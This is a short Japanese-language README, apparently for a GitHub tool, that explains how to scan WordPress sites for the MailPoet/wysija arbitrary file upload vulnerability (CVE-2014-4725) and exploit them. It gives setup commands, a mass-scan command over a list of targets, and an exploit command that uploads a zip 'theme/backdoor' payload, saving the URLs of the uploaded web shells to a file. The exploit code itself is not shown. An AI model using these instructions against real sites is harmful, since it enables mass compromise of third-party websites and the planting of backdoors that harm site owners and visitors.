
MailPoet Newsletters <= 任意のファイルアップロード (exploiter)
このスクリプトは、WordPressのCVE-2014-4725脆弱性(mailpoet/wysija newsletters)をスキャンし、悪用するために使用されます。
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
ターゲットをスキャン
python exploit.py --scan targets.txt
targets.txtにはターゲットのリストが含まれます(一行に一つ、http://なし)
ターゲットを悪用
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txtには既に脆弱であることが確認されたターゲットが含まれます
--payloadはアップロードされるテーマ/バックドアを含むzipファイルです
出力
vuln.txt > 脆弱なターゲットのリスト
shell.txt > アップロードされたシェルのURL